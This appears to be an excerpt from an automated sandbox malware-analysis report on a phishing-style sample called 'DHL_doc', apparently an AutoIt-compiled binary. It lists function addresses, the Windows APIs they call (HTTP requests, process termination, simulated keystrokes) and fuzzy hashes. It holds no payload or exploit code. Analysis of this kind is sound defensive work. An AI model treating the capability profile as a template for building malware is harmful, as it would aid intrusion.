Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 1f897c40119064eff2110a63c0e0f8d02d3c03eb94f44dd0bfa23b4d65348075
Instruction ID: 8d2ea06876dcadc0547f4c7a20be051e7f5d9788f3bd802e09bcf799b449cbd9
Opcode Fuzzy Hash: 1f897c40119064eff2110a63c0e0f8d02d3c03eb94f44dd0bfa23b4d65348075
Instruction Fuzzy Hash: 08519272C0021ABADF14EBA0DD46FEDBB74AF04310F145129F105721A2DB365B99EFA1

Function 00F3C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F3C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F3C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F3C2CA
GetLastError.KERNEL32 ref: 00F3C322
SetEvent.KERNEL32(?), ref: 00F3C336
InternetCloseHandle.WININET(00000000), ref: 00F3C341

Strings

, xrefs: 00F3C2BB

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: f8316fcf5f7fab3987befd0e718365913f50cc8bf0d8a36be8e186d45af49f6d
Instruction ID: 59db41e6f42b75774a0278c5708dd581897487d7e5488cf75f308a44e6b446b3
Opcode Fuzzy Hash: f8316fcf5f7fab3987befd0e718365913f50cc8bf0d8a36be8e186d45af49f6d
Instruction Fuzzy Hash: 1A316BB1A00308AFD7219F64DC88AAB7BFCEB49764F14851EF546A3200DB34DD05ABA1

Function 00F2989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F03AAF,?,?,Bad directive syntax error,00F5CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F298BC
LoadStringW.USER32(00000000,?,00F03AAF,?), ref: 00F298C3

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F29987

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 00F298F1
Line %d:, xrefs: 00F29912
Line %d (File "%s"):, xrefs: 00F2992D
Error: , xrefs: 00F29955
., xrefs: 00F2996D

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 27128c0f668970d0561ff1deb769339bf3355377d76dbfafbe19514c1c42b614
Instruction ID: 34bbc648adcf335925c2b5a8427e31994cdc27dcf11cad524e53467b61d9472f
Opcode Fuzzy Hash: 27128c0f668970d0561ff1deb769339bf3355377d76dbfafbe19514c1c42b614
Instruction Fuzzy Hash: 52218D3290031AABCF15EF90DC0AEEE7775FF18300F04542AF515720A2EB719658EB51

Function 00F2209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00F220AB
GetClassNameW.USER32(00000000,?,00000100), ref: 00F220C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F2214D

Strings

list, xrefs: 00F2212F
smallicons, xrefs: 00F22115
details, xrefs: 00F220FB
SHELLDLL_DefView, xrefs: 00F220CC
largeicons, xrefs: 00F220E1

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: d563f0c3743ddf78b69df71962de28c604f6dafdaa7f655e947638024731755a
Instruction ID: 4e0ceb516e1dbb598b2502d98b69d54b6cc594e35fbba9e8f7f6f5e3948b7f39
Opcode Fuzzy Hash: d563f0c3743ddf78b69df71962de28c604f6dafdaa7f655e947638024731755a
Instruction Fuzzy Hash: AC11067BA8871ABAF6017621EC06DE637DCDF15734F201126FB09B50E1FE61A8217658

Function 00EFCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00EFCEB7
_free.LIBCMT ref: 00EFCF22
_free.LIBCMT ref: 00EFCF48
_free.LIBCMT ref: 00EFCF71
_free.LIBCMT ref: 00EFCFA9
_free.LIBCMT ref: 00EFCFDA
_free.LIBCMT ref: 00EFD01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00EFD09C
_free.LIBCMT ref: 00EFD0B5

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 23eb51a5ba0a8641f0032e4faaf659763f6e3fc74dc88c990e1de86610df06e5
Instruction ID: 25b81410075c16f9d5abc049a14ae0a05ef4568982ae0a01a5b264cbe73ffdee
Opcode Fuzzy Hash: 23eb51a5ba0a8641f0032e4faaf659763f6e3fc74dc88c990e1de86610df06e5
Instruction Fuzzy Hash: 4F615672A0420DAFDB25AFB49D81A7ABBE6EF05314F34516EFB05B7281DB319D009790

Function 00F550D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00F55186
ShowWindow.USER32(?,00000000), ref: 00F551C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 00F551CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00F551D1

Part of subcall function 00F56FBA: DeleteObject.GDI32(00000000), ref: 00F56FE6

GetWindowLongW.USER32(?,000000F0), ref: 00F5520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F5521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F5524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00F55287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00F55296

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 9459a1a8bae6170402b22847dc4c66d80184d100a35ac75fff82954aedc2acac
Instruction ID: 32d4b20c2dfe6dbd97c81c81eb56404579a120692377f2c85ced15457a3064f7
Opcode Fuzzy Hash: 9459a1a8bae6170402b22847dc4c66d80184d100a35ac75fff82954aedc2acac
Instruction Fuzzy Hash: 91519131A50A08BEEF209F64CC66BD93BA5FB05B22F144012FF15966E1C775A988FF41

Function 00ED8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00F16890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00F168A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F168B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00F168D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F168F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00ED8874,00000000,00000000,00000000,000000FF,00000000), ref: 00F16901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F1691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00ED8874,00000000,00000000,00000000,000000FF,00000000), ref: 00F1692D

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: f95d35fa637ade4aeedaf83d91183c24b26800a557ec2de8cb6da23b758bb2e5
Instruction ID: a616e813aee2d1a4ae99cc6423e4237ad25941a20b0a34847c999c2ab2bdc2ec
Opcode Fuzzy Hash: f95d35fa637ade4aeedaf83d91183c24b26800a557ec2de8cb6da23b758bb2e5
Instruction Fuzzy Hash: EB516974A00309AFDB20CF24CC55BAA7BB5FB48761F10452AF956A72A0DB70A991EB50

Function 00F3C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F3C182
GetLastError.KERNEL32 ref: 00F3C195
SetEvent.KERNEL32(?), ref: 00F3C1A9

Part of subcall function 00F3C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F3C272
Part of subcall function 00F3C253: GetLastError.KERNEL32 ref: 00F3C322
Part of subcall function 00F3C253: SetEvent.KERNEL32(?), ref: 00F3C336
Part of subcall function 00F3C253: InternetCloseHandle.WININET(00000000), ref: 00F3C341

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 48137cd4888709a9a5ff863bb70bb2260d7aab6d8a8cf7db3ed2f8ad4630634a
Instruction ID: 3723df76bfb88cf60e1030ee2e7a74f9580e7c8420debf5fd98af85f34ef6398
Opcode Fuzzy Hash: 48137cd4888709a9a5ff863bb70bb2260d7aab6d8a8cf7db3ed2f8ad4630634a
Instruction Fuzzy Hash: 4A317A71600709AFDB219FA5DC44A67BBE8FF18321F00441DFA5AA6610D730E814FBE0

Function 00F225A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F23A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F23A57
Part of subcall function 00F23A3D: GetCurrentThreadId.KERNEL32 ref: 00F23A5E
Part of subcall function 00F23A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F225B3), ref: 00F23A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 00F225BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F225DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00F225DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 00F225E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F22601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00F22605
MapVirtualKeyW.USER32(00000025,00000000), ref: 00F2260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F22623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00F22627

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 14e082943a31e8095bc0e6a421efa787fbaf1a5eb1946a5540477a4b39de32d6
Instruction ID: 3462e957e3ddbaf344ffd2ab3a787bf574b74b9bb1e98da19086f0496bf021a5
Opcode Fuzzy Hash: 14e082943a31e8095bc0e6a421efa787fbaf1a5eb1946a5540477a4b39de32d6
Instruction Fuzzy Hash: 5001D431390724BBFB1067699C8AF593F99DB4EB12F100012F319AE1D1C9F62444AAA9

Function 00F21803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00F21449,?,?,00000000), ref: 00F2180C
HeapAlloc.KERNEL32(00000000,?,00F21449,?,?,00000000), ref: 00F21813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F21449,?,?,00000000), ref: 00F21828
GetCurrentProcess.KERNEL32(?,00000000,?,00F21449,?,?,00000000), ref: 00F21830
DuplicateHandle.KERNEL32(00000000,?,00F21449,?,?,00000000), ref: 00F21833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F21449,?,?,00000000), ref: 00F21843
GetCurrentProcess.KERNEL32(00F21449,00000000,?,00F21449,?,?,00000000), ref: 00F2184B
DuplicateHandle.KERNEL32(00000000,?,00F21449,?,?,00000000), ref: 00F2184E
CreateThread.KERNEL32(00000000,00000000,00F21874,00000000,00000000,00000000), ref: 00F21868

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 1bdc46515ad6a9159601dddf5473644b9afdbeaf2a94a9aff583547bfaafbf52
Instruction ID: c3721aac3e414ac086aa5448a6bea51bcce6cfe63f456b40924daeb43d04b699
Opcode Fuzzy Hash: 1bdc46515ad6a9159601dddf5473644b9afdbeaf2a94a9aff583547bfaafbf52
Instruction Fuzzy Hash: F601BBB5640708BFE710ABB5DC4DF6B3BACEB89B11F004411FB06DB1A2CA709840DB61

Function 00EF3E80 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00EF3F0B
__alldvrm.LIBCMT ref: 00EF410C
__alldvrm.LIBCMT ref: 00EF412E

Strings

}}, xrefs: 00EF3E8A
}}, xrefs: 00EF40CD
}}, xrefs: 00EF3E96, 00EF3EF1, 00EF3F0A, 00EF4090

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID: }}$}}$}}
API String ID: 1036877536-1495402609
Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
Instruction ID: 7ec35f4b16fb6d42ccdd16033d56096401dec84ad32d4765bd1eaf10a45124a1
Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
Instruction Fuzzy Hash: 6EA148B2E0138A9FDB25CF28C8917BFBBE5EF61354F14416DE685AB2C1C6388A41C751

Function 00F4A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00F2D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00F2D501
Part of subcall function 00F2D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00F2D50F
Part of subcall function 00F2D4DC: CloseHandle.KERNEL32(00000000), ref: 00F2D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F4A16D
GetLastError.KERNEL32 ref: 00F4A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F4A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 00F4A268
GetLastError.KERNEL32(00000000), ref: 00F4A273
CloseHandle.KERNEL32(00000000), ref: 00F4A2C4

Strings

SeDebugPrivilege, xrefs: 00F4A18F

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 9b71e99bbc3fea1d3d7751d70c657b5442cfb5ea457db9f9ecd6fc6a525233cb
Instruction ID: d1a225930489c0b2ce352247164c147a308b6b1405c4dac87371ca27fa4b88ab
Opcode Fuzzy Hash: 9b71e99bbc3fea1d3d7751d70c657b5442cfb5ea457db9f9ecd6fc6a525233cb
Instruction Fuzzy Hash: AA6191316443429FD710DF18C494F1ABBE1AF54318F18849CE8664B7A3C7B6ED46EB92

Function 00F53886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F53925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00F5393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F53954
_wcslen.LIBCMT ref: 00F53999
SendMessageW.USER32(?,00001057,00000000,?), ref: 00F539C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F539F4

Strings

SysListView32, xrefs: 00F538F7

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 781e1b07b2ce411c2594d2d74c7c44ebc090d4ddea514f9cc985d1853f260954
Instruction ID: b89093ca1cea4b8a6e5821369011062fa8920d8c1b80cd345f809f6d3a2fa847
Opcode Fuzzy Hash: 781e1b07b2ce411c2594d2d74c7c44ebc090d4ddea514f9cc985d1853f260954
Instruction Fuzzy Hash: B541C671E00319ABEF219F64CC45BEA77A9FF083A1F100526FA59E7181D771DA84EB90

Function 00F2BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F2BCFD
IsMenu.USER32(00000000), ref: 00F2BD1D
CreatePopupMenu.USER32 ref: 00F2BD53
GetMenuItemCount.USER32(018C8B78), ref: 00F2BDA4
InsertMenuItemW.USER32(018C8B78,?,00000001,00000030), ref: 00F2BDCC

Strings

2, xrefs: 00F2BD37
0, xrefs: 00F2BCA8

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: c1eb2cd3ba60d579e528f94f9deb021bbe1a60cec533336742061630ada344ea
Instruction ID: 0a02e113dc7095337eada478e3ee34e33e7de51f743adba3e7c34b51093e48a8
Opcode Fuzzy Hash: c1eb2cd3ba60d579e528f94f9deb021bbe1a60cec533336742061630ada344ea
Instruction Fuzzy Hash: 8951BF70A003299BDB10CFA8E888BEEBBF4FF45324F544119ED5197291E7709941EB91

Function 00EE2D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00EE2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00EE2D53
_ValidateLocalCookies.LIBCMT ref: 00EE2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00EE2E0C
_ValidateLocalCookies.LIBCMT ref: 00EE2E61

Strings

csm, xrefs: 00EE2DF6
&H, xrefs: 00EE2DFE, 00EE2E07, 00EE2E18

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &H$csm
API String ID: 1170836740-1242228090
Opcode ID: fded00eaf2f852888cb8d93c4f1c6348035246e635b762ba90a675133c9718b8
Instruction ID: 07283871ae6726d477e72c69f34004008ee3155af748d48af09262cbe3c8e741
Opcode Fuzzy Hash: fded00eaf2f852888cb8d93c4f1c6348035246e635b762ba90a675133c9718b8
Instruction Fuzzy Hash: 7141A434E0024D9BCF14DF6ACC45A9EBBB9BF44318F149159EA14BB392D7719A01CBD1

Function 00F2C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00F2C913

Strings

blank, xrefs: 00F2C895
stop, xrefs: 00F2C8E4
info, xrefs: 00F2C8B4
warning, xrefs: 00F2C8FC
question, xrefs: 00F2C8CC

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
